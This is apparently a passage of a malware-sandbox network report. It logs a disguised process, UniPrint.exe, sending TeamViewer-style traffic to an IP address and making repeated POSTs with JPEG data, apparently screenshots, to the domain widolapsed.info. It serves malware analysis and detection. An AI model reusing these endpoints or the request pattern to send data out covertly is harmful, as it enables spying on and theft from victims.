                                                                                                                  Sep 15, 2021 14:02:07.350502014 CEST1219OUTPOST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: 188.172.235.146
                                                                                                                  Content-Length: 500000
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  8192.168.2.449766188.172.235.14680C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:07.264987946 CEST1218OUTPOST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: 188.172.235.146
                                                                                                                  Content-Length: 3
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:07.348237038 CEST1218INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-length: 0
                                                                                                                  Sep 15, 2021 14:02:07.351424932 CEST1219OUTGET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: 188.172.235.146
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:07.377854109 CEST1219INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 500000
                                                                                                                  Data Raw: 17 24 11 04 00 06 45 b3 a2
                                                                                                                  Data Ascii: $E


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.44976745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2021-09-15 12:02:08 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                  Content-Length: 85991
                                                                                                                  Content-Type: multipart/form-data; boundary=--------988836371
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: widolapsed.info
                                                                                                                  Connection: Close
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2021-09-15 12:02:08 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 38 38 38 33 36 33 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------988836371Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                  2021-09-15 12:02:08 UTC0OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 4e 6a 5d 99 f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 11 b6 30 f2 ed 9b 03 ed 45 5f a0 e5 48 07 ab 35 be 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c cd ac 70 2f 59 25 3d 2e 40 e8 7b
                                                                                                                  Data Ascii: iPS4\DB.Nj]{Owe0E_H5f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,p/Y%=.@{
                                                                                                                  2021-09-15 12:02:08 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                  2021-09-15 12:02:08 UTC16OUTData Raw: e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4 f4 12 96 92 8a 04 2d 14 51 40 05 15 3d 9d ac f7 b7 49 6d 6b 19 92 69 0e 15 41 1c f7 ad 5f f8 44 3c 43 ff 00 40 a9 bf 31 fe 34 39 25 b8 24 de c6 1d 2d 6d ff 00 c2 23 e2 1f fa 05 4f fa 7f 8d 32 6f 0b eb b0 46 5e 5d 36 65 50 09 c9 c7 a6 7d 7d a9 73 47 b8 f9 5f 63 1e 92 97 a7 5a 4a 62 0a 28 a2 80 0a 29 69 28 00 a2 8a 28 00 a4 a5 a2 80 13 14 52 d1 40 05 14 51 40 09 4b 45 14 00 51 45 14 00 51 45 2d 00 25 2d 14 53 00 a2 8a 28 10 51 4b 45 00 14 51 45 31 05 14 51 40 0b 45 14 50 02 d1 45 14 08 28 a2 96 98 05 14 51 40 05
                                                                                                                  Data Ascii: Bo:#mbpz\D<C@O*hq{P1C_ZIc[zR-Q@=ImkiA_D<C@149%$-m#O2oF^]6eP}}sG_cZJb()i((R@Q@KEQEQE-%-S(QKEQE1Q@EPE(Q@
                                                                                                                  2021-09-15 12:02:08 UTC32OUTData Raw: f1 ba ff 00 bf 2d fe 14 ec c5 74 54 a2 ad ff 00 66 6a 1f f3 e3 75 ff 00 7e 5b fc 29 3f b3 35 0f f9 f1 ba ff 00 bf 2d fe 14 59 8e e8 ab 45 5b fe cc d4 0f 4b 0b af fb f2 df e1 50 4f 04 d6 d2 79 77 10 c9 13 8f e1 75 2a 7f 23 40 5c 8e 8a 28 a4 01 45 14 50 01 45 14 53 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a5 14 00 51 45 14 08 29 69 29 69 80 52 d2 52 8a 00 5a 51 40 a5 aa 48 96 c5 c5 18 a5 a2 9d 89 1a 69 b4 e3 48 69 32 90 94 51 45 20 0a 28 a2 80 16 96 92 8a 60 2d 14 52 50 21 7b d2 d2 52 d0 01 45 14 53 01 68 a4 a2 80 0a 28 a2 98 0a 29 69 29 68 10 51 45 14 00 b4 51 45 31 05 2d 14 53 10 b4 a2 92 96 98 85 a2 92 8a 00 70 a5 a6 8a 5a 64 8b 4b 49 4b 4c 05 14 b9 a6 d2 d3 42 63 a9 69 a2 94 55 22 58 ea 5a 6d 2d 31 0e a2 92 8a 62 1c 0d 38 1a 65 28 a7 71 34 3a 96 9b 4e a6 89 14
                                                                                                                  Data Ascii: -tTfju~[)?5-YE[KPOywu*#@\(EPES((QE)i)iRRZQ@HiHi2QE (`-RP!{RESh()i)hQEQE1-SpZdKIKLBciU"XZm-1b8e(q4:N
                                                                                                                  2021-09-15 12:02:08 UTC48OUTData Raw: fe e0 f4 6b e9 5e c7 6d ae 7f c7 c4 7f ee 56 51 35 ab ae 7f c7 ca 7f b9 59 46 b3 c3 fc 08 8c 57 f1 18 99 a5 a4 a3 e9 5b 9c c2 e6 8a 4a 5e 68 04 28 34 e1 4d c5 38 54 96 85 a7 0a 65 3c 52 65 21 68 a2 8a 45 21 c2 9c 29 a3 8a 70 15 2c b4 38 53 85 20 14 ec 54 b3 44 2d 2d 26 29 40 a4 ca 43 85 38 53 40 a7 0a 86 52 1c 29 d9 a6 0a 78 a4 cb 42 8a 75 34 53 aa 59 48 70 ae 1b c6 80 0b 8b 6c 7f 75 bf 9d 77 03 bd 70 de 34 ff 00 8f 9b 7f f7 1b f9 d5 52 dc 53 38 4a 4d a0 9c 9a 76 28 ac 6c 75 dc 69 45 3d a8 d8 a7 b5 3a 8a 2c 82 ec 6e c5 f4 a5 d8 3d 29 d4 51 64 2b b1 a5 14 f6 a0 46 a0 f4 a7 52 d3 b2 0b b0 a5 23 23 06 92 96 98 86 f9 6b 8c 50 10 28 c0 14 ea 28 b2 0b b1 bb 17 d2 8d 8b e9 4f a4 a2 c8 2e c6 ec 5f 4a 36 2f a5 3a 8a 2c 82 ec 6f 96 be 94 bb 17 18 c5 2d 14 59 05 d8
                                                                                                                  Data Ascii: k^mVQ5YFW[J^h(4M8Te<Re!hE!)p,8S TD--&)@C8S@R)xBu4SYHpluwp4RS8JMv(luiE=:,n=)Qd+FR##kP((O._J6/:,o-Y
                                                                                                                  2021-09-15 12:02:08 UTC64OUTData Raw: be 12 4f 2d 84 8b 7f 28 fd e4 ab 3f ee d9 bb b6 cd b9 c9 ff 00 7b 19 ed da a5 3a ec 8d 2e 90 ed 6c bf f1 2e 75 91 b0 fc ce cb b4 02 78 e3 e5 45 5e fd 33 59 54 51 c8 83 99 93 5e 5e 5d 5f dc 9b 8b db 89 a7 7e 42 99 64 2e 54 67 38 04 f6 e6 a2 a4 a5 aa 8a 49 59 0a 4d b7 76 58 b1 bb 6b 2b a1 30 8d 25 52 ac 8f 1b e7 0e 8c 08 61 c7 23 83 d6 b4 ad 35 6d 32 ca 14 36 76 97 70 cb 1d cc 73 90 f2 2c be 78 43 90 85 b0 bb 06 79 e1 5b 27 e9 58 b4 52 94 6e 0a 56 34 6d b5 89 20 d3 2f ec 9a dc 48 2e b3 e5 be ec 34 19 65 66 c7 1c 83 b5 78 f6 cd 25 ee a1 6b 7b e6 5c 4b 61 22 df ca 3f 79 2a cf 88 d9 bb b6 cd b9 c9 ff 00 7b 19 ed da a8 51 49 53 48 6e 6d ee 5c 6d 4e 72 ba 61 88 14 93 4d 52 23 72 d9 c9 de 5c 1c 76 eb 8c 7b 54 cb a9 58 c3 7d 6f 7b 6b a5 c9 14 d1 ce 93 32 fd a7 31
                                                                                                                  Data Ascii: O-(?{:.l.uxE^3YTQ^^]_~Bd.Tg8IYMvXk+0%Ra#5m26vps,xCy['XRnV4m /H.4efx%k{\Ka"?y*{QISHnm\mNraMR#r\v{TX}o{k21
                                                                                                                  2021-09-15 12:02:08 UTC80OUTData Raw: 03 83 c8 e7 bf 4a 98 5d 5f 45 66 f1 dd b5 e4 52 49 30 4b 72 12 26 9a 41 8c 91 85 ca 0e 87 93 81 8f ce 80 37 68 ae 76 2b ed 42 5b 75 84 cd 24 52 8b ff 00 b3 97 91 23 2f b0 a6 ee 42 e5 73 cf 6e 38 1e f5 6e 03 79 79 79 73 1a df cb 12 59 ba c4 30 88 4c a7 68 62 cd 95 ef 9c 7c b8 ef f8 1f d7 f5 f7 81 aa 92 24 80 98 dd 58 29 2a 76 9c e0 8e a3 eb 4e ae 6a 39 2e ad 23 9a ed 2e 88 88 6a 46 33 00 45 da ca d2 6d 39 24 67 3c e4 60 81 c7 4a e9 68 5b 5c 3a 85 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 55 7b eb a1 67 6e 26 65 0c 0c b1 c6 72 71 8d ce ab 9c fb 6e cf e1 40 19 f1 6a b7 af 67 6b 7b 25 8d ba db 5c 18 b0 56 e5 8b 81 23 28 1f 2e c0 3f 88 67 9a d8 ae 5e 1d 46 c5 bc 37 a5 da ad ed b1 b8 43 66 1a 21 2a ef 05
                                                                                                                  Data Ascii: J]_EfRI0Kr&A7hv+B[u$R#/Bsn8nyyysY0Lhb|$X)*vNj9.#.jF3Em9$g<`Jh[\:Q@Q@Q@Q@Q@Q@Q@Q@U{gn&erqn@jgk{%\V#(.?g^F7Cf!*
                                                                                                                  2021-09-15 12:02:08 UTC84OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 38 38 38 33 36 33 37 31 2d 2d 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------988836371--
                                                                                                                  2021-09-15 12:02:13 UTC84INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 15 Sep 2021 12:02:08 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                  Set-Cookie: X-Csrf-Token=ef2078fc4999dd1cbaa40acdbc5c5709bd5dfe14a1f0041797db52394cd6e5b2; expires=Thu, 15-Sep-2022 12:02:09 GMT; Max-Age=31536000; httponly
                                                                                                                  Content-Length: 48
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                  2021-09-15 12:02:13 UTC84INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                                  Data Ascii: y80aRR64VR1K\!~v]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.44983845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2021-09-15 12:03:14 UTC84OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                  Content-Length: 86008
                                                                                                                  Content-Type: multipart/form-data; boundary=--------2871961252
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: widolapsed.info
                                                                                                                  Connection: Close
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2021-09-15 12:03:14 UTC84OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 37 31 39 36 31 32 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2871961252Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                  2021-09-15 12:03:14 UTC84OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 4e 6a 5d 99 f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 00 b6 30 f2 ed 9b 03 ed 45 5f a0 e5 48 07 ab 35 be 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c cd ac 70 2f 59 25 3d 2e 40 e8 7b
                                                                                                                  Data Ascii: iPS4\DB.Nj]{Owe0E_H5f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,p/Y%=.@{
                                                                                                                  2021-09-15 12:03:14 UTC85OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                  2021-09-15 12:03:14 UTC101OUTData Raw: e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4 f4 12 96 92 8a 04 2d 14 51 40 05 15 3d 9d ac f7 b7 49 6d 6b 19 92 69 0e 15 41 1c f7 ad 5f f8 44 3c 43 ff 00 40 a9 bf 31 fe 34 39 25 b8 24 de c6 1d 2d 6d ff 00 c2 23 e2 1f fa 05 4f fa 7f 8d 32 6f 0b eb b0 46 5e 5d 36 65 50 09 c9 c7 a6 7d 7d a9 73 47 b8 f9 5f 63 1e 92 97 a7 5a 4a 62 0a 28 a2 80 0a 29 69 28 00 a2 8a 28 00 a4 a5 a2 80 13 14 52 d1 40 05 14 51 40 09 4b 45 14 00 51 45 14 00 51 45 2d 00 25 2d 14 53 00 a2 8a 28 10 51 4b 45 00 14 51 45 31 05 14 51 40 0b 45 14 50 02 d1 45 14 08 28 a2 96 98 05 14 51 40 05
                                                                                                                  Data Ascii: Bo:#mbpz\D<C@O*hq{P1C_ZIc[zR-Q@=ImkiA_D<C@149%$-m#O2oF^]6eP}}sG_cZJb()i((R@Q@KEQEQE-%-S(QKEQE1Q@EPE(Q@
                                                                                                                  2021-09-15 12:03:14 UTC117OUTData Raw: f1 ba ff 00 bf 2d fe 14 ec c5 74 54 a2 ad ff 00 66 6a 1f f3 e3 75 ff 00 7e 5b fc 29 3f b3 35 0f f9 f1 ba ff 00 bf 2d fe 14 59 8e e8 ab 45 5b fe cc d4 0f 4b 0b af fb f2 df e1 50 4f 04 d6 d2 79 77 10 c9 13 8f e1 75 2a 7f 23 40 5c 8e 8a 28 a4 01 45 14 50 01 45 14 53 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a5 14 00 51 45 14 08 29 69 29 69 80 52 d2 52 8a 00 5a 51 40 a5 aa 48 96 c5 c5 18 a5 a2 9d 89 1a 69 b4 e3 48 69 32 90 94 51 45 20 0a 28 a2 80 16 96 92 8a 60 2d 14 52 50 21 7b d2 d2 52 d0 01 45 14 53 01 68 a4 a2 80 0a 28 a2 98 0a 29 69 29 68 10 51 45 14 00 b4 51 45 31 05 2d 14 53 10 b4 a2 92 96 98 85 a2 92 8a 00 70 a5 a6 8a 5a 64 8b 4b 49 4b 4c 05 14 b9 a6 d2 d3 42 63 a9 69 a2 94 55 22 58 ea 5a 6d 2d 31 0e a2 92 8a 62 1c 0d 38 1a 65 28 a7 71 34 3a 96 9b 4e a6 89 14
                                                                                                                  Data Ascii: -tTfju~[)?5-YE[KPOywu*#@\(EPES((QE)i)iRRZQ@HiHi2QE (`-RP!{RESh()i)hQEQE1-SpZdKIKLBciU"XZm-1b8e(q4:N
                                                                                                                  2021-09-15 12:03:14 UTC133OUTData Raw: da 78 c1 3f d1 21 3e 95 c7 5a 8f f4 d8 7f df 5f e7 59 61 9f ee 0f 46 be 95 ec 76 da e7 fc 7c 47 fe e5 65 13 5a ba e7 fc 7c a7 fb 95 94 6b 3c 3f c0 88 c5 7f 11 89 9a 5a 4a 3e 95 b9 cc 2e 68 a4 a5 e6 80 42 83 4e 14 dc 53 85 49 68 5a 70 a6 53 c5 26 52 16 8a 28 a4 52 1c 29 c2 9a 38 a7 01 52 cb 43 85 38 52 01 4e c5 4b 34 42 d2 d2 62 94 0a 4c a4 38 53 85 34 0a 70 a8 65 21 c2 9d 9a 60 a7 8a 4c b4 28 a7 53 45 3a a5 94 87 0a e1 bc 68 00 b8 b6 c7 f7 5b f9 d7 70 3b d7 0d e3 4f f8 f9 b7 ff 00 71 bf 9d 55 2d c5 33 84 a4 da 09 c9 a7 62 8a c6 c7 5d c6 94 53 da 8d 8a 7b 53 a8 a2 c8 2e c6 ec 5f 4a 5d 83 d2 9d 45 16 42 bb 1a 51 4f 6a 04 6a 0f 4a 75 2d 3b 20 bb 0a 52 32 30 69 29 69 88 6f 96 b8 c5 01 02 8c 01 4e a2 8b 20 bb 1b b1 7d 28 d8 be 94 fa 4a 2c 82 ec 6e c5 f4 a3 62
                                                                                                                  Data Ascii: x?!>Z_YaFv|GeZ|k<?ZJ>.hBNSIhZpS&R(R)8RC8RNK4BbL8S4pe!`L(SE:h[p;OqU-3b]S{S._J]EBQOjjJu-; R20i)ioN }(J,nb
                                                                                                                  2021-09-15 12:03:14 UTC149OUTData Raw: 5c ee f7 34 2f b5 0b 4b e1 24 f2 d8 48 b7 f2 8f de 4a b3 fe ed 9b bb 6c db 9c 9f f7 b1 9e dd aa 53 ae c8 d2 e9 0e d6 cb ff 00 12 e7 59 1b 0f cc ec bb 40 27 8e 3e 54 55 ef d3 35 95 45 1c 88 39 99 35 e5 e5 d5 fd c9 b8 bd b8 9a 77 e4 29 96 42 e5 46 73 80 4f 6e 6a 2a 4a 5a a8 a4 95 90 a4 db 77 65 8b 1b b6 b2 ba 13 08 d2 55 2a c8 f1 be 70 e8 c0 86 1c 72 38 3d 6b 4a d3 56 d3 2c a1 43 67 69 77 0c b1 dc c7 39 0f 22 cb e7 84 39 08 5b 0b b0 67 9e 15 b2 7e 95 8b 45 29 46 e0 a5 63 46 db 58 92 0d 32 fe c9 ad c4 82 eb 3e 5b ee c3 41 96 56 6c 71 c8 3b 57 8f 6c d2 5e ea 16 b7 be 65 c4 b6 12 2d fc a3 f7 92 ac f8 8d 9b bb 6c db 9c 9f f7 b1 9e dd aa 85 14 95 34 86 e6 de e5 c6 d4 e7 2b a6 18 81 49 34 d5 22 37 2d 9c 9d e5 c1 c7 6e b8 c7 b5 4c ba 95 8c 37 d6 f7 b6 ba 5c 91 4d
                                                                                                                  Data Ascii: \4/K$HJlSY@'>TU5E95w)BFsOnj*JZweU*pr8=kJV,Cgiw9"9[g~E)FcFX2>[AVlq;Wl^e-l4+I4"7-nL7\M
                                                                                                                  2021-09-15 12:03:14 UTC164OUTData Raw: bc 9e ea 5b 81 13 ac 91 44 b2 c3 f2 96 38 fb a8 72 07 07 91 cf 7e 95 30 ba be 8a cd e3 bb 6b c8 a4 92 60 96 e4 24 4d 34 83 19 23 0b 94 1d 0f 27 03 1f 9d 00 6e d1 5c ec 57 da 84 b6 eb 09 9a 48 a5 17 ff 00 67 2f 22 46 5f 61 4d dc 85 ca e7 9e dc 70 3d ea dc 06 f2 f2 f2 e6 35 bf 96 24 b3 75 88 61 10 99 4e d0 c5 9b 2b df 38 f9 71 df f0 3f af eb ef 03 55 24 49 01 31 ba b0 52 54 ed 39 c1 1d 47 d6 9d 5c d4 72 5d 5a 47 35 da 5d 11 10 d4 8c 66 00 8b b5 95 a4 da 72 48 ce 79 c8 c1 03 8e 95 d2 d0 b6 b8 75 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 aa f7 d7 42 ce dc 4c ca 18 19 63 8c e4 e3 1b 9d 57 39 f6 dd 9f c2 80 33 e2 d5 6f 5e ce d6 f6 4b 1b 75 b6 b8 31 60 ad cb 17 02 46 50 3e 5d 80 7f 10 cf 35 b1 5c bc 3a
                                                                                                                  Data Ascii: [D8r~0k`$M4#'n\WHg/"F_aMp=5$uaN+8q?U$I1RT9G\r]ZG5]frHyu(((((((((BLcW93o^Ku1`FP>]5\:
                                                                                                                  2021-09-15 12:03:14 UTC168OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 37 31 39 36 31 32 35 32 2d 2d 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2871961252--
                                                                                                                  2021-09-15 12:03:27 UTC168INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 15 Sep 2021 12:03:15 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                  Set-Cookie: X-Csrf-Token=667a5337f302a9acbfdf6c17f4438ea697df523d5032981d2884c12523352bbc; expires=Thu, 15-Sep-2022 12:03:15 GMT; Max-Age=31536000; httponly
                                                                                                                  Content-Length: 48
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                  2021-09-15 12:03:27 UTC169INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                                  Data Ascii: y80aRR64VR1K\!~v]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.44984345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2021-09-15 12:04:29 UTC169OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                  Content-Length: 85958
                                                                                                                  Content-Type: multipart/form-data; boundary=--------2035396243
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: widolapsed.info
                                                                                                                  Connection: Close
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 33 35 33 39 36 32 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2035396243Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 4e 6a 5d 99 f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 72 b6 30 f2 ed 9b 03 ed 45 5f a0 e5 48 07 ab 35 be 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c cd ac 70 2f 59 25 3d 2e 40 e8 7b
